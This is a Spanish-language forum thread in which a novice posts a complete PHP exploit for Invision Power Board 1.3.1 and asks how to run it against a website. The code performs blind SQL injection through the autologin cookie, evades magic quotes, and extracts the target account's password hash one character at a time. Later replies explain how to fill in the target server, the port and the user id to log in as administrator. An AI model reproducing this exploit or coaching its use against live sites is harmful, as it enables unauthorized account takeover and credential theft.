Páginas: [1] 
|
 |
|
 Autor
|
Tema: Ayuda con el exploit .php (Leído 472 veces)
|
alexis11
 Desconectado
Mensajes: 22
|
Hola, estoy intentando ejecutar este exploit, es para Invision Power Board v1.3.1 ¿Este exploit es para logearse como admin?Pero el problema despues de compilarlo, ejecuto el exploit y me sale esto: Warning: fsockopen(): php_network_getaddresses: gethostbyname failed in C:\My Mu
sic\Bamcompile\exploit3.php on line 57
Warning: fsockopen(): unable to connect to SERVER:80 in C:\My Music\Bamcompile\e
xploit3.php on line 57
1: 0 <?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
// milw0rm.com [2005-06-08]
|
|
|
|
« Última modificación: 01 Enero 2007, 21:42 por alexis11 »
|
En línea
|
|
|
|
alone-in-the-chat
 Conectado
Mensajes: 528
|
xDºº no debes de ejecutar nada x que si  primero revisa la logica del programa no kreo que el servidor al que te deseas conectar se llame "SERVER" $server = "SERVER";
$port = 80;
$file = "PATH";
debes de editar esas lineas  con los datos de tu servidor te recomiendo que aprendas a programar en php no se trata de ejecutar algo x que si =) Saludos´ |
|
|
|
|
En línea
|
Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
|
|
|
alexis11
Desconectado
Mensajes: 22
|
como consigo esos datos??
El server seria la url de la web ¿¿NO??
Port no se
file no se
|
|
|
|
|
En línea
|
|
|
|
alone-in-the-chat
Conectado
Mensajes: 528
|
5mentarios .... |
|
|
|
|
En línea
|
Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
|
|
|
alexis11
Desconectado
Mensajes: 22
|
¿pon me un ejemplo de como estaria configurado?
¿Cual es el user y la pass?
el path, server y port que pongo hay??
|
|
|
|
|
En línea
|
|
|
|
RevangelyonX
Desconectado
Mensajes: 117
|
Porfavor, que lammer... La gente como tú, son la causa de que el Hacker, se defina como lo define la sociedad.... Y no me estoy llamando hacker. Bueno para empezar, deberias leerte 4 cosas, mejor dicho un buen manual de PHP y poder comprender ese código. y también algo de SQL ya que hay algunos trozos del script con SQL. Con este exploit, si, puedes loguearte como Administrador. En server deberás poner www.webvulnerable.comEl UId dice que no es importante poner uno en concreto, te pone el 10... pero puedes poner el 1. Y el password lo deja en blanco. Realmente es bonito este exploit... ¿pon me un ejemplo de como estaria configurado?
¿Cual es el user y la pass?
el path, server y port que pongo hay?? ejem... http://www.google.com/search?hl=es&q=define%3Alammer&btnG=B%C3%BAsqueda+en+Google&lr=Te hacemos todo el trabajo... |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
